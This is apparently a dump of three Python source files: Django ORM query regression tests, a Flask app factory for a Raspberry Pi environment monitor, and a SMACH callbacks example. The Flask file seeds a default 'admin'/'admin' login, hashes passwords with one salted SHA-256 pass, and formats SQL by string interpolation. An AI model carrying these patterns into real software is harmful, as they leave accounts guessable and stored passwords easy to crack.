        self.assertEqual(str(qs.query).count('JOIN'), 0)
        qs = qs.filter(Q(a__f1='foo') | Q(b__f1='foo'))
        # So, now the a__f1 join doesn't need promotion.
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        # But b__f1 does.
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
        qs = BaseA.objects.filter(Q(a__f1='foo') | Q(b__f1='foo'))
        # Now the join to a is created as LOUTER
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        qs = qs.filter(Q(a=1) | Q(a=2))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
    def test_disjunction_promotion6(self):
        qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
        self.assertEqual(str(qs.query).count('JOIN'), 0)
        qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
        qs = BaseA.objects.filter(Q(a__f1='foo') & Q(b__f1='foo'))
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
        self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
        qs = qs.filter(Q(a=1) | Q(a=2))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 2)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 0)
    def test_disjunction_promotion7(self):
        qs = BaseA.objects.filter(Q(a=1) | Q(a=2))
        self.assertEqual(str(qs.query).count('JOIN'), 0)
        qs = BaseA.objects.filter(Q(a__f1='foo') | (Q(b__f1='foo') & Q(a__f1='bar')))
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
        qs = BaseA.objects.filter(
            (Q(a__f1='foo') | Q(b__f1='foo')) & (Q(a__f1='bar') | Q(c__f1='foo'))
        )
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
        self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
        qs = BaseA.objects.filter(
            Q(a__f1='foo') | Q(a__f1='bar') & (Q(b__f1='bar') | Q(c__f1='foo'))
        )
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
    def test_disjunction_promotion_fexpression(self):
        qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(b__f1='foo'))
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 1)
        self.assertEqual(str(qs.query).count('INNER JOIN'), 1)
        qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | Q(b__f1='foo'))
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
        qs = BaseA.objects.filter(Q(a__f1=F('b__f1')) | Q(a__f2=F('b__f2')) | Q(c__f1='foo'))
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 3)
        qs = BaseA.objects.filter(Q(a__f1=F('c__f1')) | (Q(pk=1) & Q(pk=2)))
        self.assertEqual(str(qs.query).count('LEFT OUTER JOIN'), 2)
        self.assertEqual(str(qs.query).count('INNER JOIN'), 0)
class ManyToManyExcludeTest(TestCase):
    """exclude() across many-to-many relations returns the complement of the
    matching filter() without NULL-check artifacts in the SQL."""
    def test_exclude_many_to_many(self):
        i_extra = Identifier.objects.create(name='extra')
        i_program = Identifier.objects.create(name='program')
        program = Program.objects.create(identifier=i_program)
        i_channel = Identifier.objects.create(name='channel')
        channel = Channel.objects.create(identifier=i_channel)
        channel.programs.add(program)
        # channel contains 'program1', so all Identifiers except that one
        # should be returned
        self.assertSequenceEqual(
            Identifier.objects.exclude(program__channel=channel).order_by('name'),
            [i_channel, i_extra],
        )
        self.assertSequenceEqual(
            Identifier.objects.exclude(program__channel=None).order_by('name'),
            [i_program],
        )
    def test_ticket_12823(self):
        pg3 = Page.objects.create(text='pg3')
        pg2 = Page.objects.create(text='pg2')
        pg1 = Page.objects.create(text='pg1')
        pa1 = Paragraph.objects.create(text='pa1')
        pa1.page.set([pg1, pg2])
        pa2 = Paragraph.objects.create(text='pa2')
        pa2.page.set([pg2, pg3])
        pa3 = Paragraph.objects.create(text='pa3')
        ch1 = Chapter.objects.create(title='ch1', paragraph=pa1)
        ch2 = Chapter.objects.create(title='ch2', paragraph=pa2)
        ch3 = Chapter.objects.create(title='ch3', paragraph=pa3)
        b1 = Book.objects.create(title='b1', chapter=ch1)
        b2 = Book.objects.create(title='b2', chapter=ch2)
        b3 = Book.objects.create(title='b3', chapter=ch3)
        q = Book.objects.exclude(chapter__paragraph__page__text='pg1')
        # The exclude() must not compile an extra IS NOT NULL check (#12823).
        self.assertNotIn('IS NOT NULL', str(q.query))
        self.assertEqual(len(q), 2)
        self.assertNotIn(b1, q)
        self.assertIn(b2, q)
        self.assertIn(b3, q)
class RelabelCloneTest(TestCase):
    def test_ticket_19964(self):
        """#19964: using a queryset inside another queryset's __in must not
        mutate (relabel aliases of) the inner queryset itself."""
        my1 = MyObject.objects.create(data='foo')
        my1.parent = my1
        my1.save()
        my2 = MyObject.objects.create(data='bar', parent=my1)
        parents = MyObject.objects.filter(parent=F('id'))
        children = MyObject.objects.filter(parent__in=parents).exclude(parent=F('id'))
        self.assertEqual(list(parents), [my1])
        # Evaluating the children query (which has parents as part of it) does
        # not change results for the parents query.
        self.assertEqual(list(children), [my2])
        self.assertEqual(list(parents), [my1])
class Ticket20101Tests(TestCase):
    def test_ticket_20101(self):
        """
        ORing two querysets must work when one side is an exclude() that
        compiles to a subquery (#20101).
        """
        tag = Tag.objects.create(name='foo')
        first = Annotation.objects.create(tag=tag, name='a1')
        second = Annotation.objects.create(tag=tag, name='a2')
        third = Annotation.objects.create(tag=tag, name='a3')
        note = Note.objects.create(note='foo', misc='bar')
        excluded = Note.objects.exclude(annotation__in=[first, second])
        included = Note.objects.filter(annotation__in=[third])
        # No annotation is attached to the note in this test, so it passes
        # the exclude() but not the filter(); the union must still keep it.
        self.assertIn(note, excluded)
        self.assertNotIn(note, included)
        self.assertIn(note, (excluded | included))
class EmptyStringPromotionTests(SimpleTestCase):
    def test_empty_string_promotion(self):
        """
        Filtering on an empty related string only forces a LEFT OUTER JOIN
        on backends that interpret empty strings as NULL.
        """
        query_sql = str(RelatedObject.objects.filter(single__name='').query)
        if not connection.features.interprets_empty_strings_as_nulls:
            self.assertNotIn('LEFT OUTER JOIN', query_sql)
        else:
            self.assertIn('LEFT OUTER JOIN', query_sql)
class ValuesSubqueryTests(TestCase):
    def test_values_in_subquery(self):
        """A values_list() subquery supplies its own selected column for the
        __in comparison instead of the relation's default field."""
        # If a values() queryset is used, then the given values
        # will be used instead of forcing use of the relation's field.
        o1 = Order.objects.create(id=-2)
        o2 = Order.objects.create(id=-1)
        oi1 = OrderItem.objects.create(order=o1, status=0)
        oi1.status = oi1.pk
        oi1.save()
        OrderItem.objects.create(order=o2, status=0)
        # The query below should match o1 as it has related order_item
        # with id == status.
        self.assertSequenceEqual(Order.objects.filter(items__in=OrderItem.objects.values_list('status')), [o1])
class DoubleInSubqueryTests(TestCase):
    def test_double_subquery_in(self):
        """A values_list() subquery may itself be filtered through another
        values_list() subquery (stacked __in lookups)."""
        leaf_a_foo = LeafA.objects.create(data='foo')
        leaf_a_bar = LeafA.objects.create(data='bar')
        leaf_b_one = LeafB.objects.create(data='lfb1')
        leaf_b_two = LeafB.objects.create(data='lfb2')
        Join.objects.create(a=leaf_a_foo, b=leaf_b_one)
        Join.objects.create(a=leaf_a_bar, b=leaf_b_two)
        # Two stacked subqueries: matching A pks -> join rows -> B ids.
        matching_a_pks = LeafA.objects.filter(data='foo').values_list('pk', flat=True)
        matching_b_ids = Join.objects.filter(a__in=matching_a_pks).values_list('b__id', flat=True)
        result = LeafB.objects.filter(pk__in=matching_b_ids)
        self.assertSequenceEqual(result, [leaf_b_one])
class Ticket18785Tests(SimpleTestCase):
    def test_ticket_18785(self):
        """Join trimming (#18785): this exclude/filter combination compiles
        to exactly one INNER JOIN and no OUTER JOINs."""
        qs = Item.objects.exclude(
            note__isnull=False
        ).filter(
            name='something', creator__extra__isnull=True
        ).order_by()
        sql = str(qs.query)
        self.assertEqual(sql.count('INNER JOIN'), 1)
        self.assertEqual(sql.count('OUTER JOIN'), 0)
class Ticket20788Tests(TestCase):
    def test_ticket_20788(self):
        """exclude() across chapter -> paragraph -> page drops only the book
        whose paragraph sits on the excluded page (#20788)."""
        Paragraph.objects.create()
        para_on_page = Paragraph.objects.create()
        page = para_on_page.page.create()
        chapter_on_page = Chapter.objects.create(paragraph=para_on_page)
        Book.objects.create(chapter=chapter_on_page)
        para_off_page = Paragraph.objects.create()
        Page.objects.create()
        chapter_off_page = Chapter.objects.create(paragraph=para_off_page)
        surviving_book = Book.objects.create(chapter=chapter_off_page)
        not_on_page = Book.objects.exclude(chapter__paragraph__page=page)
        self.assertSequenceEqual(not_on_page, [surviving_book])
class Ticket12807Tests(TestCase):
    def test_ticket_12807(self):
        """A tautological ~Q(pk__in=[]) ORed into a condition must not change
        the results (#12807)."""
        wanted = Paragraph.objects.create()
        other = Paragraph.objects.create()
        # ~Q(pk__in=[]) is always True, so only the ANDed pk filter matters.
        qs = Paragraph.objects.filter((Q(pk=other.pk) | ~Q(pk__in=[])) & Q(pk=wanted.pk))
        self.assertSequenceEqual(qs, [wanted])
class RelatedLookupTypeTests(TestCase):
    """
    Passing the wrong model instance to a relational lookup raises
    ValueError, while proxy, child, and parent instances of the right
    type are accepted.
    """
    error = 'Cannot query "%s": Must be "%s" instance.'
    @classmethod
    def setUpTestData(cls):
        cls.oa = ObjectA.objects.create(name="oa")
        cls.poa = ProxyObjectA.objects.get(name="oa")
        cls.coa = ChildObjectA.objects.create(name="coa")
        # An unrelated model instance sharing the same pk as cls.oa.
        cls.wrong_type = Order.objects.create(id=cls.oa.pk)
        cls.ob = ObjectB.objects.create(name="ob", objecta=cls.oa, num=1)
        cls.pob1 = ProxyObjectB.objects.create(name="pob", objecta=cls.oa, num=2)
        cls.pob = ProxyObjectB.objects.all()
        cls.c = ObjectC.objects.create(childobjecta=cls.coa)
    def test_wrong_type_lookup(self):
        """
        A ValueError is raised when the incorrect object type is passed to a
        query lookup.
        """
        # Passing incorrect object type
        with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectA._meta.object_name)):
            ObjectB.objects.get(objecta=self.wrong_type)
        with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectA._meta.object_name)):
            ObjectB.objects.filter(objecta__in=[self.wrong_type])
        with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectA._meta.object_name)):
            ObjectB.objects.filter(objecta=self.wrong_type)
        with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectB._meta.object_name)):
            ObjectA.objects.filter(objectb__in=[self.wrong_type, self.ob])
        # Passing an object of the class on which query is done.
        with self.assertRaisesMessage(ValueError, self.error % (self.ob, ObjectA._meta.object_name)):
            ObjectB.objects.filter(objecta__in=[self.poa, self.ob])
        with self.assertRaisesMessage(ValueError, self.error % (self.ob, ChildObjectA._meta.object_name)):
            ObjectC.objects.exclude(childobjecta__in=[self.coa, self.ob])
    def test_wrong_backward_lookup(self):
        """
        A ValueError is raised when the incorrect object type is passed to a
        query lookup for backward relations.
        """
        with self.assertRaisesMessage(ValueError, self.error % (self.oa, ObjectB._meta.object_name)):
            ObjectA.objects.filter(objectb__in=[self.oa, self.ob])
        with self.assertRaisesMessage(ValueError, self.error % (self.oa, ObjectB._meta.object_name)):
            ObjectA.objects.exclude(objectb=self.oa)
        with self.assertRaisesMessage(ValueError, self.error % (self.wrong_type, ObjectB._meta.object_name)):
            ObjectA.objects.get(objectb=self.wrong_type)
    def test_correct_lookup(self):
        """
        When passing proxy model objects, child objects, or parent objects,
        lookups work fine.
        """
        out_a = [self.oa]
        out_b = [self.ob, self.pob1]
        out_c = [self.c]
        # proxy model objects
        self.assertSequenceEqual(ObjectB.objects.filter(objecta=self.poa).order_by('name'), out_b)
        self.assertSequenceEqual(ObjectA.objects.filter(objectb__in=self.pob).order_by('pk'), out_a * 2)
        # child objects
        self.assertSequenceEqual(ObjectB.objects.filter(objecta__in=[self.coa]), [])
        self.assertSequenceEqual(ObjectB.objects.filter(objecta__in=[self.poa, self.coa]).order_by('name'), out_b)
        self.assertSequenceEqual(
            ObjectB.objects.filter(objecta__in=iter([self.poa, self.coa])).order_by('name'),
            out_b
        )
        # parent objects
        self.assertSequenceEqual(ObjectC.objects.exclude(childobjecta=self.oa), out_c)
        # QuerySet related object type checking shouldn't issue queries
        # (the querysets aren't evaluated here, hence zero queries) (#23266).
        with self.assertNumQueries(0):
            ObjectB.objects.filter(objecta__in=ObjectA.objects.all())
    def test_values_queryset_lookup(self):
        """
        #23396 - Ensure ValueQuerySets are not checked for compatibility with the lookup field
        """
        # Make sure the num and objecta field values match.
        ob = ObjectB.objects.get(name='ob')
        ob.num = ob.objecta.pk
        ob.save()
        pob = ObjectB.objects.get(name='pob')
        pob.num = pob.objecta.pk
        pob.save()
        self.assertSequenceEqual(ObjectB.objects.filter(
            objecta__in=ObjectB.objects.all().values_list('num')
        ).order_by('pk'), [ob, pob])
class Ticket14056Tests(TestCase):
    def test_ticket_14056(self):
        """#14056: descending order_by() over a nullable reverse relation
        sorts NULLs according to the backend's nulls_order_largest feature.
        """
        s1 = SharedConnection.objects.create(data='s1')
        s2 = SharedConnection.objects.create(data='s2')
        s3 = SharedConnection.objects.create(data='s3')
        PointerA.objects.create(connection=s2)
        # s2 is the only row with a pointer; the rest sort by NULL handling.
        expected_ordering = (
            [s1, s3, s2] if connection.features.nulls_order_largest
            else [s2, s1, s3]
        )
        self.assertSequenceEqual(SharedConnection.objects.order_by('-pointera__connection', 'pk'), expected_ordering)
class Ticket20955Tests(TestCase):
    def test_ticket_20955(self):
        """#20955: select_related() over two multi-hop paths joins all six
        tables and leaves no follow-up queries when accessing the chain.
        """
        jack = Staff.objects.create(name='jackstaff')
        jackstaff = StaffUser.objects.create(staff=jack)
        jill = Staff.objects.create(name='jillstaff')
        jillstaff = StaffUser.objects.create(staff=jill)
        task = Task.objects.create(creator=jackstaff, owner=jillstaff, title="task")
        task_get = Task.objects.get(pk=task.pk)
        # Load data so that assertNumQueries doesn't complain about the get
        # version's queries.
        task_get.creator.staffuser.staff
        task_get.owner.staffuser.staff
        qs = Task.objects.select_related(
            'creator__staffuser__staff', 'owner__staffuser__staff')
        self.assertEqual(str(qs.query).count(' JOIN '), 6)
        task_select_related = qs.get(pk=task.pk)
        with self.assertNumQueries(0):
            self.assertEqual(task_select_related.creator.staffuser.staff,
                             task_get.creator.staffuser.staff)
            self.assertEqual(task_select_related.owner.staffuser.staff,
                             task_get.owner.staffuser.staff)
class Ticket21203Tests(TestCase):
    def test_ticket_21203(self):
        """defer() on a select_related parent must still populate the
        parent's non-deferred fields correctly (#21203)."""
        parent = Ticket21203Parent.objects.create(parent_bool=True)
        child = Ticket21203Child.objects.create(parent=parent)
        deferred_qs = Ticket21203Child.objects.select_related('parent').defer('parent__created')
        self.assertSequenceEqual(deferred_qs, [child])
        self.assertIs(deferred_qs[0].parent.parent_bool, True)
class ValuesJoinPromotionTests(TestCase):
    """Join promotion rules when the query is reduced with values()."""
    def test_values_no_promotion_for_existing(self):
        qs = Node.objects.filter(parent__parent__isnull=False)
        self.assertIn(' INNER JOIN ', str(qs.query))
        # Adding values() must not promote the already-INNER join.
        qs = qs.values('parent__parent__id')
        self.assertIn(' INNER JOIN ', str(qs.query))
        # Make sure there is a left outer join without the filter.
        qs = Node.objects.values('parent__parent__id')
        self.assertIn(' LEFT OUTER JOIN ', str(qs.query))
    def test_non_nullable_fk_not_promoted(self):
        qs = ObjectB.objects.values('objecta__name')
        self.assertIn(' INNER JOIN ', str(qs.query))
    def test_ticket_21376(self):
        a = ObjectA.objects.create()
        ObjectC.objects.create(objecta=a)
        qs = ObjectC.objects.filter(
            Q(objecta=a) | Q(objectb__objecta=a),
        )
        qs = qs.filter(
            Q(objectb=1) | Q(objecta=a),
        )
        self.assertEqual(qs.count(), 1)
        tblname = connection.ops.quote_name(ObjectB._meta.db_table)
        self.assertIn(' LEFT OUTER JOIN %s' % tblname, str(qs.query))
class ForeignKeyToBaseExcludeTests(TestCase):
    def test_ticket_21787(self):
        """filter()/exclude() through a FK targeting an inherited base model
        return complementary sets (#21787)."""
        special_one = SpecialCategory.objects.create(special_name='sc1', name='sc1')
        special_two = SpecialCategory.objects.create(special_name='sc2', name='sc2')
        special_three = SpecialCategory.objects.create(special_name='sc3', name='sc3')
        item = CategoryItem.objects.create(category=special_one)
        CategoryItem.objects.create(category=special_two)
        excluded = SpecialCategory.objects.exclude(categoryitem__id=item.pk).order_by('name')
        matched = SpecialCategory.objects.filter(categoryitem__id=item.pk)
        self.assertSequenceEqual(excluded, [special_two, special_three])
        self.assertSequenceEqual(matched, [special_one])
class ReverseM2MCustomPkTests(TestCase):
    def test_ticket_21879(self):
        """M2M lookups work in both directions when the related model has a
        custom primary key (#21879)."""
        custom_tag = CustomPkTag.objects.create(id='cpt1', tag='cpt1')
        custom = CustomPk.objects.create(name='cp1', extra='extra')
        custom.custompktag_set.add(custom_tag)
        self.assertSequenceEqual(CustomPk.objects.filter(custompktag=custom_tag), [custom])
        self.assertSequenceEqual(CustomPkTag.objects.filter(custom_pk=custom), [custom_tag])
class Ticket22429Tests(TestCase):
    def test_ticket_22429(self):
        """Negating an F() comparison across relations keeps the student
        without a matching classroom in the result (#22429)."""
        first_school = School.objects.create()
        enrolled = Student.objects.create(school=first_school)
        second_school = School.objects.create()
        unenrolled = Student.objects.create(school=second_school)
        classroom = Classroom.objects.create(school=first_school)
        classroom.students.add(enrolled)
        queryset = Student.objects.filter(~Q(classroom__school=F('school')))
        self.assertSequenceEqual(queryset, [unenrolled])
class Ticket23605Tests(TestCase):
    def test_ticket_23605(self):
        """#23605: nested subqueries in a complex Q must have their table
        aliases relabeled correctly (see also #24090)."""
        # Test filtering on a complicated q-object from ticket's report.
        # The query structure is such that we have multiple nested subqueries.
        # The original problem was that the inner queries weren't relabeled
        # correctly.
        # See also #24090.
        a1 = Ticket23605A.objects.create()
        a2 = Ticket23605A.objects.create()
        c1 = Ticket23605C.objects.create(field_c0=10000.0)
        Ticket23605B.objects.create(
            field_b0=10000.0, field_b1=True,
            modelc_fk=c1, modela_fk=a1)
        complex_q = Q(pk__in=Ticket23605A.objects.filter(
            Q(
                # True for a1 as field_b0 = 10000, field_c0=10000
                # False for a2 as no ticket23605b found
                ticket23605b__field_b0__gte=1000000 /
                F("ticket23605b__modelc_fk__field_c0")
            ) &
            # True for a1 (field_b1=True)
            Q(ticket23605b__field_b1=True) & ~Q(ticket23605b__pk__in=Ticket23605B.objects.filter(
                ~(
                    # Same filters as above commented filters, but
                    # double-negated (one for Q() above, one for
                    # parentheses). So, again a1 match, a2 not.
                    Q(field_b1=True) &
                    Q(field_b0__gte=1000000 / F("modelc_fk__field_c0"))
                )
            ))).filter(ticket23605b__field_b1=True))
        qs1 = Ticket23605A.objects.filter(complex_q)
        self.assertSequenceEqual(qs1, [a1])
        qs2 = Ticket23605A.objects.exclude(complex_q)
        self.assertSequenceEqual(qs2, [a2])
class TestTicket24279(TestCase):
    def test_ticket_24278(self):
        """An empty pk__in=() ORed with an empty Q() matches nothing, even
        though rows exist (#24279)."""
        School.objects.create()
        empty_match = School.objects.filter(Q(pk__in=()) | Q())
        self.assertQuerysetEqual(empty_match, [])
class TestInvalidValuesRelation(SimpleTestCase):
    def test_invalid_values(self):
        """Filtering a relation with a value of the wrong type raises
        ValueError, for both direct and __in lookups."""
        msg = "Field 'id' expected a number but got 'abc'."
        with self.assertRaisesMessage(ValueError, msg):
            Annotation.objects.filter(tag='abc')
        with self.assertRaisesMessage(ValueError, msg):
            Annotation.objects.filter(tag__in=[123, 'abc'])
class TestTicket24605(TestCase):
    def test_ticket_24605(self):
        """
        Subquery table names should be quoted.
        """
        i1 = Individual.objects.create(alive=True)
        RelatedIndividual.objects.create(related=i1)
        i2 = Individual.objects.create(alive=False)
        RelatedIndividual.objects.create(related=i2)
        i3 = Individual.objects.create(alive=True)
        i4 = Individual.objects.create(alive=False)
        # Only i4 is both not alive and without a related individual;
        # exclude() with the same Q pair returns the complement.
        self.assertSequenceEqual(Individual.objects.filter(Q(alive=False), Q(related_individual__isnull=True)), [i4])
        self.assertSequenceEqual(
            Individual.objects.exclude(Q(alive=False), Q(related_individual__isnull=True)).order_by('pk'),
            [i1, i2, i3]
        )
class Ticket23622Tests(TestCase):
    @skipUnlessDBFeature('can_distinct_on_fields')
    def test_ticket_23622(self):
        """
        Make sure __pk__in and __in work the same for related fields when
        using a distinct on subquery.
        """
        a1 = Ticket23605A.objects.create()
        a2 = Ticket23605A.objects.create()
        c1 = Ticket23605C.objects.create(field_c0=0.0)
        # Create the same eight B rows as before, in the same order, without
        # repeating the create() call eight times.
        # NOTE(review): every a1 row has field_b0 < 300, so only a2 can
        # satisfy the gte=300 condition asserted at the bottom.
        for modela, field_b0 in [
            (a1, 123), (a1, 23), (a1, 234), (a1, 12),
            (a2, 567), (a2, 76), (a2, 7), (a2, 56),
        ]:
            Ticket23605B.objects.create(
                modela_fk=modela, field_b0=field_b0,
                field_b1=True,
                modelc_fk=c1,
            )
        qx = (
            Q(ticket23605b__pk__in=Ticket23605B.objects.order_by('modela_fk', '-field_b1').distinct('modela_fk')) &
            Q(ticket23605b__field_b0__gte=300)
        )
        qy = (
            Q(ticket23605b__in=Ticket23605B.objects.order_by('modela_fk', '-field_b1').distinct('modela_fk')) &
            Q(ticket23605b__field_b0__gte=300)
        )
        # The pk__in and plain __in spellings must produce the same rows.
        self.assertEqual(
            set(Ticket23605A.objects.filter(qx).values_list('pk', flat=True)),
            set(Ticket23605A.objects.filter(qy).values_list('pk', flat=True))
        )
        self.assertSequenceEqual(Ticket23605A.objects.filter(qx), [a2])
| 42.112306 | 119 | 0.631153 |
6b4cf1fe4a7ecfa0f2937c7b72372bf7fdab0558 | 2,415 | py | Python | webserver/__init__.py | danshardware/pi-env-monitor | f16d5109e105b887e86beb37eca45cadd2021aa4 | [
"MIT"
] | null | null | null | webserver/__init__.py | danshardware/pi-env-monitor | f16d5109e105b887e86beb37eca45cadd2021aa4 | [
"MIT"
] | null | null | null | webserver/__init__.py | danshardware/pi-env-monitor | f16d5109e105b887e86beb37eca45cadd2021aa4 | [
"MIT"
] | null | null | null | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from sqlalchemy.exc import OperationalError
import os, secrets, sys
from hashlib import sha256
# init SQLAlchemy so we can use it later in our models
db = SQLAlchemy()
def create_secret(logger):
    """Generate a random per-session secret key and warn that it is ephemeral.

    Args:
        logger: a logging.Logger used to report that the fallback is in use.

    Returns:
        A 64-character hex string (32 random bytes from ``secrets``).
    """
    secret = secrets.token_hex(32)
    # Bug fix: Logger.warn is a deprecated alias removed in Python 3.13;
    # use Logger.warning instead.
    logger.warning("No secret provided in the SECRET_KEY environment variable. Using %s for this session", secret)
    return secret
# Checks whether the DB is seeded and seeds it if it's not
def seed_db(db, logger):
    """Insert the default admin user (username "admin", password "admin").

    Args:
        db: Flask-SQLAlchemy handle whose engine is used for the insert.
        logger: logging.Logger for progress and failure reporting.

    Returns:
        True when the admin row was inserted, False on an OperationalError.
    """
    logger.warning("Database is being initialized")
    try:
        with db.engine.connect() as con:
            salt = secrets.token_hex(16)
            passwordHash = sha256('{}:{}'.format(salt, "admin").encode('utf-8')).hexdigest()
            # NOTE(review): both interpolated values are locally generated hex
            # strings, but building SQL by string formatting is fragile —
            # switch to parameterized execution if the inputs ever change.
            con.execute("INSERT into users (id, username, salt, password, data) VALUES (0, 'admin', '{}', '{}', '')".format(salt, passwordHash))
    except OperationalError as e:
        # Bug fix: the original used the invalid printf placeholder "%2" and
        # referenced e.detail (often empty/unreliable); log the exception
        # itself with a proper %s placeholder. Also warn -> warning, since
        # Logger.warn was removed in Python 3.13.
        logger.warning("Failed to add admin user: %s", e)
        return False
    else:
        return True
def create_app():
    """Application factory: build and fully initialize the Flask app.

    Configures the secret key and database, seeds the DB on first run
    (exiting with status 3 when seeding fails), wires up Flask-Login,
    and registers the auth and main blueprints.
    """
    app = Flask(__name__)
    # Fall back to a random per-process secret when SECRET_KEY is unset.
    app.config['SECRET_KEY'] = os.getenv('SECRET_KEY') or create_secret(app.logger)
    app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:////var/pi-env/db.sqlite')
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    db.init_app(app)
    # Push an app context so the DB queries below work at startup time.
    app.app_context().push()
    from .models import User
    weGood = True
    try:
        userCount = db.session.query(User).count()
        if userCount == 0:
            # Tables exist but are empty: seed the admin user.
            weGood = seed_db(db, app.logger)
    except OperationalError:
        # No DB setup. Create it:
        db.create_all()
        weGood = seed_db(db, app.logger)
    if not weGood:
        app.logger.error("Exiting because of DB issue")
        sys.exit(3)
    login_manager = LoginManager()
    login_manager.login_view = 'auth.login'
    login_manager.init_app(app)
    @login_manager.user_loader
    def load_user(user_id):
        # since the user_id is just the primary key of our user table, use it in the query for the user
        return User.query.get(int(user_id))
    # blueprint for auth routes in our app
    from .auth import auth as auth_blueprint
    app.register_blueprint(auth_blueprint)
    # blueprint for non-auth parts of app
    from .main import main as main_blueprint
    app.register_blueprint(main_blueprint)
    return app
c6b6e82caa9ed5eb1f641c56e61322509773328a | 14,216 | py | Python | smacha_ros/test/smacha_generated_py/smacha_test_examples/callbacks_generate_output.py | ReconCell/smacha | 253215a35d2d091bf50c28c1ba876209b82d2400 | [
"BSD-3-Clause"
] | 16 | 2019-04-16T07:44:30.000Z | 2022-03-10T08:04:45.000Z | smacha_ros/test/smacha_generated_py/smacha_test_examples/callbacks_generate_output.py | ReconCell/smacha | 253215a35d2d091bf50c28c1ba876209b82d2400 | [
"BSD-3-Clause"
] | 2 | 2019-07-18T09:11:00.000Z | 2019-09-26T10:21:26.000Z | smacha_ros/test/smacha_generated_py/smacha_test_examples/callbacks_generate_output.py | ReconCell/smacha | 253215a35d2d091bf50c28c1ba876209b82d2400 | [
"BSD-3-Clause"
] | 2 | 2019-08-21T20:14:54.000Z | 2019-09-19T13:26:34.000Z | #!/usr/bin/env python
import roslib
import rospy
import smach
import smach_ros
import random
# Define normal callback for 'animals' output key
@smach.cb_interface(input_keys=['animals'],
output_keys=['animals'],
outcomes=['succeeded'])
def foo_animals_cb(userdata):
userdata['animals'].append('turtles')
return 'succeeded'
# Define normal callback for 'numbers' output key
@smach.cb_interface(input_keys=['numbers'],
output_keys=['numbers'],
outcomes=['succeeded'])
def foo_numbers_cb(userdata):
userdata['numbers'].append(userdata['numbers'][-1]+1)
return 'succeeded'
class Foo(smach.State):
def __init__(self, name, input_keys=[], output_keys=[], callbacks=[]):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded'])
self._name = name
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
for input_key in self._input_keys:
rospy.loginfo('Userdata input key \'{}\' BEFORE callback execution: {}'.format(input_key, userdata[input_key]))
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
for input_key in self._input_keys:
rospy.loginfo('Userdata input key \'{}\' AFTER callback execution: {}'.format(input_key, userdata[input_key]))
return 'succeeded'
class CallbacksState(smach.State):
def __init__(self, input_keys=[], output_keys=[], callbacks=[]):
smach.State.__init__(self, input_keys=input_keys, output_keys=output_keys, outcomes=['succeeded'])
self._cbs = []
if callbacks:
for cb in sorted(callbacks):
if cb in globals():
self._cbs.append(globals()[cb])
elif cb in locals():
self._cbs.append(locals()[cb])
elif cb in dir(self):
self._cbs.append(getattr(self, cb))
self._cb_input_keys = []
self._cb_output_keys = []
self._cb_outcomes = []
for cb in self._cbs:
if cb and smach.has_smach_interface(cb):
self._cb_input_keys.append(cb.get_registered_input_keys())
self._cb_output_keys.append(cb.get_registered_output_keys())
self._cb_outcomes.append(cb.get_registered_outcomes())
self.register_input_keys(self._cb_input_keys[-1])
self.register_output_keys(self._cb_output_keys[-1])
self.register_outcomes(self._cb_outcomes[-1])
def execute(self, userdata):
# Call callbacks
for (cb, ik, ok) in zip(self._cbs,
self._cb_input_keys,
self._cb_output_keys):
# Call callback with limited userdata
try:
cb_outcome = cb(self, smach.Remapper(userdata,ik,ok,{}))
except:
cb_outcome = cb(smach.Remapper(userdata,ik,ok,{}))
return 'succeeded'
@smach.cb_interface(input_keys=['animals'],
output_keys=['animals'],
outcomes=[])
def animals_foo_1_1e476907f8644a3aaf62184244d8cee1_lambda_cb(self, userdata):
lambda_cb = lambda ud: ud.animals if ud.animals.append('ducks') else ud.animals
userdata.animals = lambda_cb(userdata)
return 'succeeded'
